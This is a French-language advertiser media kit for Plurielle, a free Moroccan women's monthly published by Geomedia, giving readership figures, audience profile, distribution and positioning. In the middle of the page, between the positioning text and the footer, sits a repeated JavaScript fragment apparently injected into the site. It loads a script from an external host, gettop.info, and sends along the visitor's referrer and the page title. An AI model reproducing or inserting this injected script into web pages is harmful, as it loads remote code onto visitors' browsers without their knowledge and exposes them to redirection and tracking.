Plurielle

CHIFFRES CLES*

Diffusion OJD : 21 135 exemplaires
Lectorat: 71 225 lectrices mensuelles  (Diffusion OJD x Taux de circulation)
Taux de circulation : 76% des lectrices de Plurielle déclarent partager leur magazine de telle sorte qu’en moyenne plus de 3 personnes lisent le même numéro (3,37 fois)

*Chiffres tirés de l’étude TNS réalisée en novembre 2012 sur une base de 400 personnes* – Questionnaire Terrain de 20 minutes

PROFIL DE L’AUDIENCE

42% de femmes actives
CSP ABC+   77%
AGE :
De 16 à 20 ans : 30%
De 21 à 30 ans : 45%
De 31 et plus : 25%

CARTE D’IDENTITE

Date de création : Décembre 2006
Parution : Autour du 5 de chaque mois
Périodicité : Mensuelle
Prix du numéro : Offert
Canal de diffusion : Réseau de 550 partenaires-dépositaires sur les villes de Casablanca, Marrakech, Rabat et Tanger

POSITIONNEMENT

Plurielle est la marque média féminine des 20/35 ans, complice de la femme urbaine marocaine.

FONCTION MEDIA

Recruter et fidéliser des femmes jeunes et consommatrices de nouveautés et de tendances.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »; s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;

*Geomedia est le seul groupe de presse sur le marché marocain à proposer une démarche qualitative à ses partenaires annonceurs et agences : des études de lectorat pour chacun de nos supports et produits par un cabinet international des plus réputés de la place. Cette démarche de transparence vise à fournir des chiffres fiables et experts pour que les annonceurs puissent investir à la juste mesure de nos performances média.

Accès direct : Média et hors média

Sélectionnez un support
Sélectionnez un support
Sélectionnez un support
Sélectionnez une opération
Sélectionnez une opération

Nos opérations spéciales

NOS OPÉRATIONS SPÉCIALES